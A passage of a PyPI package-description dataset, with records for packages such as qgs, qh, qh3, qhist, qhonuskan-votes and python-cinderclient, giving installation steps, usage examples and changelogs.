by:npm--prefix./jsinstallWhen uninstalling it, you need to clean up the JS symlinks via scriptunlink_dev.py:pipuninstallqgridnext\npython./unlink_dev.pyContributingAll contributions, bug reports, bug fixes, documentation improvements, enhancements, demo improvements and ideas are welcome."} +{"package": "qgridtrusted", "pacakge-description": "qgridtrustedA fork ofqgridusingtrusted publishing.To reduce the changes required to adopt this fork, the project is installed asqgridtrustedand the Python package is imported asqgrid. For details of how\nto use theqgridpackage seeREADME.rst.Pull requests including automated tests are welcome.PrioritiesThis fork should:Be easy to installBe compatible with recent releases of its dependenciesMinimise changes to the Python code (see below)Changes to the Python codeCommand to view the changes to the Python code:git diff 877b420d3bd83297bbcc97202b914001a85afff2.. 
'*.py'Command to view a summary of the number of lines changed usingcloc:cloc --vcs=git --include-lang=Python --diff 877b420d3bd83297bbcc97202b914001a85afff2 HEAD"} +{"package": "qgs", "pacakge-description": "Quasi-Geostrophic Spectral model (qgs)General Informationqgs is a Python implementation of an atmospheric model for midlatitudes. It models the dynamics of\na 2-layerquasi-geostrophicchannel\natmosphere on abeta-plane, coupled to a simple land orshallow-waterocean component.About(c) 2020-2023 qgs Developers and ContributorsPart of the code originates from the PythonMAOOAMimplementation by Maxime Tondeur and Jonathan Demaeyer.SeeLICENSE.txtfor license information.Please cite the code description article if you use (a part of) this software for a publication:Demaeyer J., De Cruz, L. and Vannitsem, S. , (2020). qgs: A flexible Python framework of reduced-order multiscale climate models.Journal of Open Source Software,5(56), 2597,https://doi.org/10.21105/joss.02597.Please consult the qgscode repositoryfor updates.InstallationWith pipThe easiest way to install and run qgs is to usepippip install qgsand you are set!Additionally, you can clone the repositorygit clone https://github.com/Climdyn/qgs.gitand perform a test by running the scriptpython qgs/qgs_rp.pyto see if everything runs smoothly (this should take less than a minute).With AnacondaThe easiest way to install and run qgs is to use an appropriate environment created throughAnaconda.First install Anaconda and clone the repository:git clone https://github.com/Climdyn/qgs.gitThen install and activate the Python3 Anaconda environment:conda env create -f environment.yml\nconda activate qgsYou can then perform a test by running the scriptpython qgs_rp.pyto see if everything runs smoothly (this should take less than a minute).Note for Windows and MacOS usersPresently, qgs is compatible with Windows and MacOS but users wanting to use qgs inside their Python scripts must guard the main script with aif __name__ == \"__main__\":clause and add the following lines belowfrom multiprocessing import freeze_support\n freeze_support()About this usage, see for example the main scriptsqgs_rp.pyandqgs_maooam.pyin the root folder.\nNote that the Jupyter notebooks are not concerned by this recommendation and work perfectly well on both operating systems.Why?These lines are required to make the multiprocessing library works with these operating systems. Seeherefor more details,\nand in particularthis section.Activating DifferentialEquations.jl optional supportIn addition to the qgs builtin Runge-Kutta integrator, the qgs model can alternatively be integrated with a package calledDifferentialEquations.jlwritten inJulia, and available through thediffeqpypython package.\nThe diffeqpy package first installation step is done by Anaconda in the qgs environment but then you mustinstall Juliaand follow the final manual installation instruction found in thediffeqpy README.These can be summed up as opening a terminal and doing:conda activate qgs\npythonand then inside the Python command line interface do:>>> import diffeqpy\n>>> diffeqpy.install()which will then finalize the installation. 
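As a side note to the Windows/MacOS remark earlier in this section, the required script layout is small enough to show in full. A minimal sketch, where the body of `main()` is only a placeholder and the two multiprocessing lines are the ones quoted above:

```python
# Minimal sketch of the script layout recommended above for Windows/MacOS:
# guard the entry point and call freeze_support() before using qgs.
from multiprocessing import freeze_support

def main():
    # ... build and integrate the model here, as in qgs_rp.py / qgs_maooam.py ...
    pass

if __name__ == "__main__":
    freeze_support()
    main()
```

The bundled `qgs_rp.py` and `qgs_maooam.py` scripts follow this pattern, as noted above.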
An example of a notebook using this package is available in the documentation and onreadthedocs.DocumentationTo build the documentation, please run (with the conda environment activated):cd documentation\nmake htmlYou may need to installmakeif it is not already present on your system.\nOnce built, the documentation is availablehere.The documentation is also available online on read the docs:https://qgs.readthedocs.io/Usageqgs can be used by editing and running the scriptqgs_rp.pyandqgs_maooam.pyfound in the main folder.For more advanced usages, please read theUser Guides.ExamplesAnother nice way to run the model is through the use of Jupyter notebooks.\nSimple examples can be found in thenotebooks folder.\nFor instance, runningconda activate qgs\ncd notebooks\njupyter-notebookwill lead you to your favorite browser where you can load and run the examples.Dependenciesqgs needs mainly:Numpyfor numeric supportsparsefor sparse multidimensional arrays supportNumbafor code accelerationSympyfor symbolic manipulation of inner productsCheck the yaml fileenvironment.ymlfor the dependencies.Forthcoming developmentsScientific development (short-to-mid-term developments)Non-autonomous equation (seasonality, etc...)Energy diagnosticsTechnical mid-term developmentsDimensionally robust Parameter class operationVectorization of the tensor computationLong-term development trackActive advectionTrue quasi-geostrophic ocean when using ocean model versionSalinity in the oceanSymbolic PDE equation specificationNumerical basis of functionContributing to qgsIf you want to contribute actively to the roadmap detailed above, please contact the main authors.In addition, if you have made changes that you think will be useful to others, please feel free to suggest these as a pull request on theqgs Github repository.More information and guidance about how to do a pull request for qgs can be found in the documentationhere.Other atmospheric models in PythonNon-exhaustive list:Q-GCM: A mid-latitude grid based ocean-atmosphere model like MAOOAM. 
Code in Fortran,\ninterface is in Python.pyqg: A pseudo-spectral python solver for quasi-geostrophic systems.Isca: Research GCM written in Fortran and largely\nconfigured with Python scripts, with internal coding changes required for non-standard cases."} +{"package": "qgsctx", "pacakge-description": "Initialize data providers and map layers for QGIS plugins which are launched as standalone applications"} +{"package": "qgsgl", "pacakge-description": "Conversion tool for QGIS map project into webmapgl styleUsageSourcesGeoJSONfromqgsglimportGeoJSONSourceurl='https://example.com/data/stations.geojson'source=GeoJSONSource('stations',url)source.add_layer(station_layer)source.write('/www/data/stations.geojson')style.add_source(source)VectorfromqgsglimportVectorSourceurl='https://example.com/tiles/project.json'source=VectorSource('project',url)source.add_layer(station_layer,min_zoom=12,max_zoom=14)source.add_layer(street_layer,min_zoom=10,max_zoom=14)source.write('/www/tiles/project.mbtiles')style.add_source(source)Running Testspython -m unittest discoverChangelog[0.1.2] - 2019-06-20Fixes fill layer label placed incorrectly (#50)Multiple symbol layers now display in correct order (#52)Fill layer no brush property now controls fill color (#53)Circle layer will not generate two GL layers (#54)[0.1.1] - 2019-05-20Fixes bugs with color not using alpha channel (#45)Created checks for unsupported symbol layer and simplified layer class\nselection logic (#46)Removed incorrect visibility logic from layer converter (#51)[0.1.0] - 2019-05-02Initial release"} +{"package": "qg-spider-sdk", "pacakge-description": "\u722c\u866b\u7cfb\u7edf\u516c\u5171\u7c7b\u5c01\u88c5\u76ee\u6807redis db \u5212\u5206url \u8bb0\u5f55\u6c60\u5c01\u88c5\u4e0b\u8f7d\u9875\u9762\u6c60\u5c01\u88c5\u89e3\u6790\u7ed3\u679c\u6c60\u5c01\u88c5\u7f51\u7ad9\u4fe1\u606f\u7c7b\u5c01\u88c5redis db \u5212\u5206(0-15)- 0 -> \u5e38\u7528\u7684\u961f\u5217\u4e0e\u6709\u5e8f\u96c6\u6216\u96c6\u5408\n\u5176\u4e2d\u7684hash\u8868\u5b9a\u4e49\n - website -> \u7f51\u7ad9\u4fe1\u606f\n - url_record -> url \u8bb0\u5f55\u6c60\n - url_page -> \u4e0b\u8f7d\u9875\u9762\u6c60\u5c01\u88c5\n - parse_result -> \u89e3\u6790\u7ed3\u679c\u6c60\u5c01\u88c5\n- 10-15 -> \u76d1\u63a7\u81ea\u884c\u5904\u7406"} +{"package": "qg-struct", "pacakge-description": "\u5e95\u5c42\u5c01\u88c5(redis)pip install pytestpip install -r requirements.txt\u5b89\u88c5\u4f9d\u8d56pytest\u8fd0\u884c\u6d4b\u8bd5\u7528\u4f8b"} +{"package": "qg.test", "pacakge-description": "qg.test========"} +{"package": "qg-tool", "pacakge-description": "# \u5de5\u5177\u7c7b"} +{"package": "qg_utils", "pacakge-description": "# qg_utils### Testing\nTo run tests:`sh $ python-munittest discover `### Installation\nusing pip:`sh $ pip install qg_utils `using setuptools:`sh $ git clonehttps://github.com/quantumgraph/qg_utils$ cd qg_utils $ pip install qg_utils `"} +{"package": "qg.web", "pacakge-description": "qg.web======="} +{"package": "qgweb3", "pacakge-description": "# QG \u4e00\u4e9b\u4e2a\u4eba\u4f7f\u7528\u7684\u5305## \u53d1\u5e03\u6d41\u7a0b\npython setup.py bdist_wheel \u2013universal\ntwine upload dist/* \u2013verbose"} +{"package": "qgym", "pacakge-description": "QGYM \u2013 A Gym for Training and Benchmarking RL-Based Quantum Compilationqgymis a software framework that provides environments for training and benchmarking RL-based quantum compilers.\nIt is built on top of OpenAI Gym and abstracts parts of the compilation process that are irrelevant to AI researchers.qgymincludes three 
environments:InitialMapping,Routing, andScheduling, each of which is customizable and extensible.DocumentationWe have created anextensive documentationwith code snippets.\nPlease feel free to contact us vias.feld@tudelft.nlif you have any questions, or by creating aGitHub issue.Getting StartedWhat follows are some simple steps to get you running.\nYou could also have a look at someJupyter Notebooksthat we have created for a tutorial at theIEEE International Conference on Quantum Computing and Engineering (QCE\u201922).Installing with pipTo install theqgymusepip install qgymIf you would also like to use the notebooks, additional packages are required, which can simply be installed by using\nIn this case, usepip install qgym[tutorial]Currentlyqgymhas support for Python 3.7, 3.8, 3.9, 3.10 and 3.11.PublicationThe paper onqgymhas been presented in the1st International Workshop on Quantum Machine Learning: From Foundations to Applications (QML@QCE'23).\nThe publication can be found oncomputer.orgYou can find the preprint of the paper onarxiv.@inproceedings{van2023qgym,\n title={qgym: A Gym for training and benchmarking RL-based quantum compilation},\n author={Van Der Linde, Stan and De Kok, Willem and Bontekoe, Tariq and Feld, Sebastian},\n booktitle={2023 IEEE International Conference on Quantum Computing and Engineering (QCE)},\n volume={2},\n pages={26--30},\n year={2023},\n organization={IEEE}\n}TeamBuilding qgym is a joint effort.Core developersStan van der LindeWillem de KokTariq BontekoeSebastian FeldContributors and Power UsersJoris HenstraRares Oancea"} +{"package": "qh", "pacakge-description": "qhQuick Http web-service construction.Getting from python to an http-service exposing them to the world,\nin the easiest way machinely possible.Harnesses the great power ofpy2httpwithout all the responsibilities.This is meant for the desireable lightening fast development cycles during\nproof-of-conceptualization.\nAs you move towards production, consider using one of those boring grown-up tools out there...To install:pip install qhExamplesWhen dealing only with simple (json) types...importqhfromqhimportmk_http_service_appdefpoke():return'here is a peek'deffoo(x:int):returnx+2defbar(name='world'):returnf\"Hello{name}!\"app=mk_http_service_app([foo,bar,poke])app.run()Bottle v0.12.19 server starting up (using WSGIRefServer())...\nListening on http://127.0.0.1:8080/\nHit Ctrl-C to quit.Now grab a browser and go tohttp://127.0.0.1:8080/ping(it's a GET route that the app gives you for free, to test if alive){\"ping\": \"pong\"}Now try some post requests:Run this script somewhere. 
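If you prefer Python to a shell, the same endpoints can be exercised with an HTTP client. A short sketch using the third-party `requests` package (an assumption -- qh itself does not require it), mirroring the curl calls shown next:

```python
# Sketch: call the service defined above once it is running on 127.0.0.1:8080.
# "requests" is only used here for illustration; any HTTP client works.
import requests

base = "http://127.0.0.1:8080"

print(requests.get(f"{base}/ping").text)                       # expect {"ping": "pong"}
print(requests.post(f"{base}/poke").text)                      # expect "here is a peek"
print(requests.post(f"{base}/foo", json={"x": 3}).text)        # expect 5
print(requests.post(f"{base}/bar", json={"name": "qh"}).text)  # expect "Hello qh!"
```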
For example, with curl try things like:curl http://127.0.0.1:8080/ping\n# should get {\"ping\": \"pong\"}\n\ncurl -X POST http://127.0.0.1:8080/poke\n# should get \"here is a peek\"\n\ncurl -H \"Content-Type: application/json\" -X POST -d '{\"x\": 3}' http://127.0.0.1:8080/foo\n# (should get 5)\n\ncurl -H \"Content-Type: application/json\" -X POST -d '{\"name\": \"qh\"}' http://127.0.0.1:8080/bar\n# should get \"hello qh!\"Now be happy (or go try the other function by doing some post requests).When your types get complicatedTo deploy the above, we would just need to doapp=mk_http_service_app([poke,foo,bar])But what if we also wanted to handle this:defadd_numpy_arrays(a,b):return(a+b).tolist()Here the a and b are assumed to be numpy arrays (or.tolist()would fail).\nOut of the box, qh can only handle json types(str, list, int, float), so we need to preprocess the input.qhmakes that easy too.Here we provide a name->conversion_func mapping (but could express it otherwise)fromqh.transimportmk_json_handler_from_name_mappingimportnumpyasnpinput_trans=mk_json_handler_from_name_mapping({\"a\":np.array,\"b\":np.array})app=mk_http_service_app([poke,foo,bar,add_numpy_arrays],input_trans=input_trans)app.run()Now try it out:curl -H \"Content-Type: application/json\" -X POST -d '{\"a\": [1,2,3], \"b\": [4,5,6]}' http://127.0.0.1:8080/add_numpy_arrays\n# should get [5, 7, 9]"} +{"package": "qh3", "pacakge-description": "What isqh3?qh3is a maintained fork of theaioquiclibrary.\nIt is lighter, faster, and more adapted to mass usage. Regularly improved and expect a better time to initial response in issues and PRs.qh3is a library for the QUIC network protocol in Python. It features\na minimal TLS 1.3 implementation, a QUIC stack, and an HTTP/3 stack.QUIC was standardized inRFC 9000and HTTP/3 inRFC 9114.qh3is regularly tested for interoperability against otherQUIC implementations.To learn more aboutqh3pleaseread the documentation.Why should I useqh3?qh3has been designed to be embedded into Python client and server\nlibraries wishing to support QUIC and/or HTTP/3. The goal is to provide a\ncommon codebase for Python libraries in the hope of avoiding duplicated effort.Both the QUIC and the HTTP/3 APIs follow the \u201cbring your own I/O\u201d pattern,\nleaving actual I/O operations to the API user. This approach has a number of\nadvantages including making the code testable and allowing integration with\ndifferent concurrency models.This library is the lowest level you can find for handling QUIC and HTTP/3. 
Here are higher libraries:mid-way:urllib3.futurehighest and easiest:niquests(Recommended!)FeaturesQUIC stack conforming withRFC 9000HTTP/3 stack conforming withRFC 9114minimal TLS 1.3 implementation conforming withRFC 8446IPv4 and IPv6 supportconnection migration and NAT rebindinglogging TLS traffic secretslogging QUIC events in QLOG formatHTTP/3 server push supportRequirementsqh3requires Python 3.7 or greater.Running the examplesqh3comes with a number of examples illustrating various QUIC use cases.You can browse these examples here:https://github.com/Ousret/qh3/tree/main/examplesLicenseqh3is released under theBSD license."} +{"package": "qha", "pacakge-description": "No description available on PyPI."} +{"package": "qhal", "pacakge-description": "Quantum Hardware Abstraction Layer package."} +{"package": "qham", "pacakge-description": "Qham - A QUICK INSIGHT INTO QUANTUM HAMILTONIAN SIMULATIONSQham is a Python SDK designed to bridge the gap between theoretical physics and practical quantum computing applications. It provides a comprehensive suite of tools for exploring, simulating, and analyzing Hamiltonian processes across statistical mechanics and quantum mechanics.At the heart of Qham lies a mission to democratize the understanding of Hamiltonian dynamics, unravel the complexities of physical systems, and streamline the development of quantum algorithms. By amalgamating theoretical concepts with practical computational tools, Qham endeavors to make the intricate study of Hamiltonian systems both accessible and intuitive.OverviewQham is a Python library that consists of the following components:ComponentDescriptionqhamA lightweight Quantum Hamiltonian Simulations for high-performance Quantum researchqham.fhmFermiHubbard Modalqham.hbmHeisenberg Modalqham.qhoQuantum Harmonic Oscillatorqham.TFIMTransverse Field Ising ModelQham, can be used for,a Hamiltonian processing in quantum mechanics and statistical mechanics.a quantum python package whichl will give a good introduction quantum hamilotnian simulations.InstallationSee the Qham[Installation][]guide for detailed installation instructions (including building from source).Currently,qhamsupports releases of Python 3.6 onwards;\nTo install the current release:$pipinstall--upgradeqhamGetting StartedMinimal Exampleimportqham# Initialize the TFIM simulationsim=TFIMSimulation(size=10,beta=0.4,h=0.05,steps=100)# Run the simulationsim.run_simulation()# Plot the final lattice configurationsim.plot_lattice()ResourcesPyPiDocumentationIssue trackingContributingWe appreciate all contributions, feedback and issues. 
If you plan to contribute new features, utility functions, or extensions to the core, please go through our [Contribution Guidelines][].To contribute, start working through theqhamcodebase, read the [Documentation][], navigate to the [Issues][] tab and start looking through interesting issues.Asking for helpIf you have any questions, please:Read the docs.Look it up in our Github Discussions (or add a new question).Search through the issues.Licenseqham is open-source and released under theMIT License."} +{"package": "qhanutils", "pacakge-description": "qhan-utilsQhan's personal utilities."} +{"package": "qhbayes", "pacakge-description": "QHBayesBayesian methods for inferring mass eruption rate from column height (or vice versa) for volcanic eruptionsWhat is it?QHBayesuses Bayesian methods to explore the relationship between the mass eruption rate (Q) of a volcanic eruption and the height reached by the volcanic eruption column (H) that is produced.The mass eruption rate is a quantity that is very important in volcanology and in the dispersion of volcanic ash in the atmosphere, but it is very difficult to measure directly.Often the mass eruption rate is inferred from observations of the height of the volcanic eruption column, since the eruption column is often much easier to measure. The eruption column height is linked to the mass eruption rate through the fluid dynamics of turbulent buoyant plumes, but there are often external volcanological and atmospheric effects that contribute and complicate the relationship.Datasets of the mass eruption rate and eruption column height have been compiled and used to determine an empirical relationship these quantities, using linear regression. This has then been used to infer the mass eruption rate from the plume height.QHBayesgoes further, by using Bayesian methods to perform the regression. Bayesian methods:allow us to incorporate a range ofuncertaintiesquantitatively into our model;provide a meaningful quantitative comparison of different models;Main FeaturesHow do I get set up?Summary of set upConfigurationDependenciesDatabase configurationHow to run testsDeployment instructionsContribution guidelinesWriting testsCode reviewOther guidelinesWho do I talk to?Repo owner or adminOther community or team contact"} +{"package": "qhbmlib", "pacakge-description": "QHBM LibraryThis repository is a collection of tools for building and training\nQuantum Hamiltonian-Based Models. 
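For the QHBayes description above, the non-Bayesian baseline it contrasts with is an ordinary log-log linear regression between column height H and mass eruption rate Q. The sketch below uses NumPy on made-up numbers purely to illustrate that baseline; it is not QHBayes' API, and the values carry no scientific meaning.

```python
# Ordinary least-squares fit of log10(Q) on log10(H) -- the classical approach
# the QHBayes description contrasts with. All numbers below are synthetic.
import numpy as np

H_km = np.array([5.0, 8.0, 12.0, 18.0, 25.0, 35.0])   # plume heights (synthetic)
Q_kgs = np.array([1e4, 1e5, 1e6, 3e7, 4e8, 1e10])     # eruption rates (synthetic)

slope, intercept = np.polyfit(np.log10(H_km), np.log10(Q_kgs), 1)

def q_from_height(h_km):
    """Point estimate of Q for a given column height, with no uncertainty attached."""
    return 10 ** (intercept + slope * np.log10(h_km))

print(f"Q(20 km) ~ {q_from_height(20.0):.3g} kg/s")
```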
These tools depend onTensorFlow Quantum,\nand are thus compatible with both real and simulated quantum computers.Installation instructionsandcontribution instructionscan be found in the docs folder.This is not an officially supported Google product."} +{"package": "qhdl", "pacakge-description": "QHDLCircuit Components as and QHDL in PythonDevelopment of QHDL happens onGithub.\nYou can read the full documentation atReadTheDocs.InstallationTo install the latest released version of QHDL, run this command in your terminal:$pipinstallqhdlThis is the preferred method to install QHDL, as it will always install the most recent stable release.If you don\u2019t havepipinstalled, thePython installation guidecan guide\nyou through the process.To install the latest development version of QHDL fromGithub.$pipinstallgit+https://github.com/mabuchilab/qhdl.git@develop#egg=qhdlUsageTo use QHDL in a project:import qhdlHistory0.1.0 (2018-12-06)Initial release"} +{"package": "qhist", "pacakge-description": "QHist\u2013 A Quick Histogram drawer forROOT::TTreefor smoother HEP analysis!Examples:Simple draw from tree and parameter (branch name):h1 = QHist()\nh1.trees = t1\nh1.params = 'M'\nh1.draw()Overlaid comparison between branches, compact syntax:QHist(trees=t1, params=['mu_PT/1e3','pi_PT/1e3'], xlabel='PT [GeV]', xmax=60).draw()Compare between trees, with filtering, and reusable via templating:H = QHist(trees=[t1, t2, t3], filters=['mu_PT>20e3'])\nH(params='APT' , xmin=0 , xlabel='PT-asymmetry').draw()\nH(params='M/1e3', xmax=120, xlabel='Mass [GeV]').draw()Read more onhttps://qhist.readthedocs.ioInstallation & dependenciesIt\u2019s available frompip install qhist.\nThe package requires an existing installation ofPyROOT.DisclaimerThis packacge was written and used during my PhD in 2013-2017 at EPFL (Lausanne) and LHCb collaboration (CERN),\nfor the work inZ->tau taucross-section measurement andH->mu tausearches at LHCb (8TeV).\nI hope it can be of a good use for future analysis\u2026"} +{"package": "qhonuskan-votes", "pacakge-description": "Easy to use reddit like voting system for django models.FeaturesDoes not use GenericForeignKeys (which irritates me when making queries)\nHas vote_buttons_for templatetag, that generates html code for your object\nfor vote buttons.Has, default_buttons.css which gives a shape your buttons as default, but\nyou can override.Has, voting_script template tag, it generates javascript code to make\najax requests for voting. Automatically finds qhonuskan_votes views.voting_script tag also renders overridable show_not_authenticated_error\nfunction, so you can use your own error windows (jquery-ui etc.) via\noverriding it.Default buttons are pure css, there is no images. So it\u2019s lite.What\u2019s new?version 0.2Definedget_versionmethod to get project version in your code.Lettuce tests are added for testing voting system.Changedvoteview name asqhonuskan_vote. 
Prefix is required for\nminimizing view name conflicts.Moved templates totemplates/qhonuskandirectory.Minimum Django version that we supported is 1.3.Quick Implementation GuideAdd qhonuskan_votes to your INSTALLED_APPS.INSTALLED_APPS = ('...',\n '...',\n 'qhonuskan_votes')AddVotesField, and addObjectsWithScoresManagerto your model.from django.db import models\nfrom qhonuskan_votes.models import VotesField\n\nclass MyModel(models.Model):\n votes = VotesField()\n # Add objects before all other managers to avoid issues mention in http://stackoverflow.com/a/4455374/1462141\n objects = models.Manager()\n\n #For just a list of objects that are not ordered that can be customized.\n objects_with_scores = ObjectsWithScoresManager()\n\n #For a objects ordered by score.\n sort_by_score = SortByScoresManager()\n ...\n ...Syncdb.Extend your urls[1].import qhonuskan_votes.urls\nfrom django.conf.urls.defaults import *\n\nurlpatterns = patterns('',\n ...\n ...\n url(r'^votes/', include(qhonuskan_votes.urls)),\n)Create the list in you view. Use#For a regular list of items without votes from your model use the following:\nitem_list_no_score = Items.objects.all()\n\n#For a list with scores that can be customized with use the following:\nitem_list_unordered_with_scores = Items.objects_with_scores.all()\n#to customize the order by a field unique to your model. So something like this:\nitem_list_unordered_with_scores = Items.objects_with_scores.all().order_by(-date_created)\n\n#To obtain a list of items sorted by vote counts like (1,0,-1) like Reddit:\nitem_list_ordered__scores = Items.sort_by_score.all()Load qhonuskan_votes templatetags from your template. You will need STATIC_PREFIX too.{% load qhonuskan_votes static %}\n{% get_static_prefix as STATIC_PREFIX %}Load default_buttons.css to give little shape to buttonsAfter that line, if you wish you can override some propertiesLoad jquery to your template10. After all, you can add voting_script template tag to your head section.\nIt generates necessary javascript code for ajax requests.{% voting_script %}use vote_buttons_for_object template tag to create buttons.{% for object in objects %}\n
\n {% vote_buttons_for object %}\n {{ object.text }}
\n{% endfor %}For further information you can inspect example project at root of the repository.ContributionYou liked this project? Nice. Let\u2019s start with provide your virtual\nenvironment. You can install all you need dependencies:$ pip install -r requirements/development.txtWe have some important conditions during the development of the project:We adopt PEP8 as Python style guide.You can send us patch for reviewing changes, but if you fork the project\nand open a pull request from github, that would be very easy for us.FootNotes[1]To use the views for up voting and down voting you include the urls.py in your\nwebsite\u2019s url patterns. You can serve qhonuskan_votes views wherever you\nwant. Javascript files updates automatically to find qhonuskan_votes views."} +{"package": "qhoptim", "pacakge-description": "No description available on PyPI."} +{"package": "qh-probability", "pacakge-description": "No description available on PyPI."} +{"package": "qh-python-cinderclient", "pacakge-description": "Python bindings to the OpenStack Cinder APIThis is a client for the OpenStack Cinder API. There\u2019s a Python API (thecinderclientmodule), and a command-line script (cinder). Each\nimplements 100% of the OpenStack Cinder API.See theOpenStack CLI Referencefor information on how to use thecindercommand-line tool. You may also want to look at theOpenStack API documentation.The project is hosted onLaunchpad, where bugs can be filed. The code is\nhosted onOpenStack. Patches must be submitted usingGerrit.License: Apache License, Version 2.0PyPi- package installationOnline DocumentationBlueprints- feature specificationsBugs- issue trackingSourceSpecsHow to ContributeContents:Command-line APIPython APICommand-line APIInstalling this package gets you a shell command,cinder, that you\ncan use to interact with any Rackspace compatible API (including OpenStack).You\u2019ll need to provide your OpenStack username and password. You can do this\nwith the--os-username,--os-passwordand--os-tenant-nameparams, but it\u2019s easier to just set them as environment variables:export OS_USERNAME=openstack\nexport OS_PASSWORD=yadayada\nexport OS_TENANT_NAME=myprojectYou will also need to define the authentication url with--os-auth-urland the version of the API with--os-volume-api-version. Or set them as\nenvironment variables as well. Since Block Storage API V2 is officially\ndeprecated, you are encouraged to setOS_VOLUME_API_VERSION=3. If you\nare using Keystone, you need to set theOS_AUTH_URLto the keystone\nendpoint:export OS_AUTH_URL=http://controller:5000/v3\nexport OS_VOLUME_API_VERSION=3Since Keystone can return multiple regions in the Service Catalog, you\ncan specify the one you want with--os-region-name(orexport OS_REGION_NAME). 
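The same credentials exported above can also be used from Python. The sketch below follows the v3 quick-start shown later in this description; passing the tenant name as the third positional argument, and reading the id/status attributes of the returned volume objects, are assumptions made for illustration rather than something documented here.

```python
# Construct the v3 client from the environment variables exported above.
# Argument order mirrors the quick-start in this description.
import os
from cinderclient.v3 import client

cinder = client.Client(
    os.environ["OS_USERNAME"],
    os.environ["OS_PASSWORD"],
    os.environ["OS_TENANT_NAME"],   # project / tenant (labelled PROJECT_ID in the quick-start)
    os.environ["OS_AUTH_URL"],
)

for volume in cinder.volumes.list():
    # 'id' and 'status' are assumed attributes of the returned volume objects
    print(volume.id, volume.status)
```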
It defaults to the first in the list returned.You\u2019ll find complete documentation on the shell by runningcinder help:usage: cinder [--version] [-d] [--os-auth-system ]\n [--service-type ] [--service-name ]\n [--volume-service-name ]\n [--os-endpoint-type ]\n [--endpoint-type ]\n [--os-volume-api-version ]\n [--bypass-url ] [--retries ]\n [--profile HMAC_KEY] [--os-auth-strategy ]\n [--os-username ] [--os-password ]\n [--os-tenant-name ]\n [--os-tenant-id ] [--os-auth-url ]\n [--os-user-id ]\n [--os-user-domain-id ]\n [--os-user-domain-name ]\n [--os-project-id ]\n [--os-project-name ]\n [--os-project-domain-id ]\n [--os-project-domain-name ]\n [--os-region-name ] [--os-token ]\n [--os-url ] [--insecure] [--os-cacert ]\n [--os-cert ] [--os-key ] [--timeout ]\n ...\n\nCommand-line interface to the OpenStack Cinder API.\n\nPositional arguments:\n \n absolute-limits Lists absolute limits for a user.\n api-version Display the server API version information. (Supported\n by API versions 3.0 - 3.latest)\n availability-zone-list\n Lists all availability zones.\n backup-create Creates a volume backup.\n backup-delete Removes one or more backups.\n backup-export Export backup metadata record.\n backup-import Import backup metadata record.\n backup-list Lists all backups.\n backup-reset-state Explicitly updates the backup state.\n backup-restore Restores a backup.\n backup-show Shows backup details.\n cgsnapshot-create Creates a cgsnapshot.\n cgsnapshot-delete Removes one or more cgsnapshots.\n cgsnapshot-list Lists all cgsnapshots.\n cgsnapshot-show Shows cgsnapshot details.\n consisgroup-create Creates a consistency group.\n consisgroup-create-from-src\n Creates a consistency group from a cgsnapshot or a\n source CG.\n consisgroup-delete Removes one or more consistency groups.\n consisgroup-list Lists all consistency groups.\n consisgroup-show Shows details of a consistency group.\n consisgroup-update Updates a consistency group.\n create Creates a volume.\n credentials Shows user credentials returned from auth.\n delete Removes one or more volumes.\n encryption-type-create\n Creates encryption type for a volume type. Admin only.\n encryption-type-delete\n Deletes encryption type for a volume type. Admin only.\n encryption-type-list\n Shows encryption type details for volume types. Admin\n only.\n encryption-type-show\n Shows encryption type details for a volume type. Admin\n only.\n encryption-type-update\n Update encryption type information for a volume type\n (Admin Only).\n endpoints Discovers endpoints registered by authentication\n service.\n extend Attempts to extend size of an existing volume.\n extra-specs-list Lists current volume types and extra specs.\n failover-host Failover a replicating cinder-volume host.\n force-delete Attempts force-delete of volume, regardless of state.\n freeze-host Freeze and disable the specified cinder-volume host.\n get-capabilities Show backend volume stats and properties. Admin only.\n get-pools Show pool information for backends. 
Admin only.\n image-metadata Sets or deletes volume image metadata.\n image-metadata-show\n Shows volume image metadata.\n list Lists all volumes.\n manage Manage an existing volume.\n metadata Sets or deletes volume metadata.\n metadata-show Shows volume metadata.\n metadata-update-all\n Updates volume metadata.\n migrate Migrates volume to a new host.\n qos-associate Associates qos specs with specified volume type.\n qos-create Creates a qos specs.\n qos-delete Deletes a specified qos specs.\n qos-disassociate Disassociates qos specs from specified volume type.\n qos-disassociate-all\n Disassociates qos specs from all its associations.\n qos-get-association\n Lists all associations for specified qos specs.\n qos-key Sets or unsets specifications for a qos spec.\n qos-list Lists qos specs.\n qos-show Shows qos specs details.\n quota-class-show Lists quotas for a quota class.\n quota-class-update Updates quotas for a quota class.\n quota-defaults Lists default quotas for a tenant.\n quota-delete Delete the quotas for a tenant.\n quota-show Lists quotas for a tenant.\n quota-update Updates quotas for a tenant.\n quota-usage Lists quota usage for a tenant.\n rate-limits Lists rate limits for a user.\n readonly-mode-update\n Updates volume read-only access-mode flag.\n rename Renames a volume.\n reset-state Explicitly updates the volume state in the Cinder\n database.\n retype Changes the volume type for a volume.\n service-disable Disables the service.\n service-enable Enables the service.\n service-list Lists all services. Filter by host and service binary.\n (Supported by API versions 3.0 - 3.latest)\n set-bootable Update bootable status of a volume.\n show Shows volume details.\n snapshot-create Creates a snapshot.\n snapshot-delete Removes one or more snapshots.\n snapshot-list Lists all snapshots.\n snapshot-manage Manage an existing snapshot.\n snapshot-metadata Sets or deletes snapshot metadata.\n snapshot-metadata-show\n Shows snapshot metadata.\n snapshot-metadata-update-all\n Updates snapshot metadata.\n snapshot-rename Renames a snapshot.\n snapshot-reset-state\n Explicitly updates the snapshot state.\n snapshot-show Shows snapshot details.\n snapshot-unmanage Stop managing a snapshot.\n thaw-host Thaw and enable the specified cinder-volume host.\n transfer-accept Accepts a volume transfer.\n transfer-create Creates a volume transfer.\n transfer-delete Undoes a transfer.\n transfer-list Lists all transfers.\n transfer-show Shows transfer details.\n type-access-add Adds volume type access for the given project.\n type-access-list Print access information about the given volume type.\n type-access-remove Removes volume type access for the given project.\n type-create Creates a volume type.\n type-default List the default volume type.\n type-delete Deletes volume type or types.\n type-key Sets or unsets extra_spec for a volume type.\n type-list Lists available 'volume types'.\n type-show Show volume type details.\n type-update Updates volume type name, description, and/or\n is_public.\n unmanage Stop managing a volume.\n upload-to-image Uploads volume to Image Service as an image.\n version-list List all API versions. 
